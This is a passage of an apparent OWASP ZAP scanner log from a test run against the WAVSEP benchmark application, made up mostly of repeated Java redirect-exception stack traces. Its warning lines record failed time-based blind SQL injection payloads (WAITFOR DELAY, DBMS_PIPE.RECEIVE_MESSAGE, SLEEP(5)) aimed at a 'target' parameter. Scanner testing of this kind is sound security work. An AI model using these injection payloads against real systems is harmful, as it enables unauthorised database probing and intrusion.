org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962821 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962823 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962825 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(88)||CHR(78)||CHR(110)||CHR(113),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(88)||CHR(78)||CHR(110)||CHR(113),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962826 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(73)||CHR(112)||CHR(81)||CHR(65),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(73)||CHR(112)||CHR(81)||CHR(65),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962828 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(73)||CHR(66)||CHR(69)||CHR(104),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(73)||CHR(66)||CHR(69)||CHR(104),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962829 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(106)||CHR(100)||CHR(100)||CHR(97),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(106)||CHR(100)||CHR(100)||CHR(97),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962830 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(81)||CHR(74)||CHR(119),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(81)||CHR(74)||CHR(119),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962831 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(81)||CHR(119)||CHR(101)||CHR(113),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(81)||CHR(119)||CHR(101)||CHR(113),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962832 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) AND (SELECT * FROM (SELECT(SLEEP(5)))oDXg) AND (6426=6426] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) AND (SELECT * FROM (SELECT(SLEEP(5)))oDXg) AND (6426=6426 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962832 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp AND (SELECT * FROM (SELECT(SLEEP(5)))BxAw)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp AND (SELECT * FROM (SELECT(SLEEP(5)))BxAw) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962835 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') AND (SELECT * FROM (SELECT(SLEEP(5)))JDih) AND ('Lfpu'='Lfpu] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') AND (SELECT * FROM (SELECT(SLEEP(5)))JDih) AND ('Lfpu'='Lfpu at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962835 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' AND (SELECT * FROM (SELECT(SLEEP(5)))zunI) AND 'LafK'='LafK] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' AND (SELECT * FROM (SELECT(SLEEP(5)))zunI) AND 'LafK'='LafK at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962837 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' AND (SELECT * FROM (SELECT(SLEEP(5)))cWvq) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' AND (SELECT * FROM (SELECT(SLEEP(5)))cWvq) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at 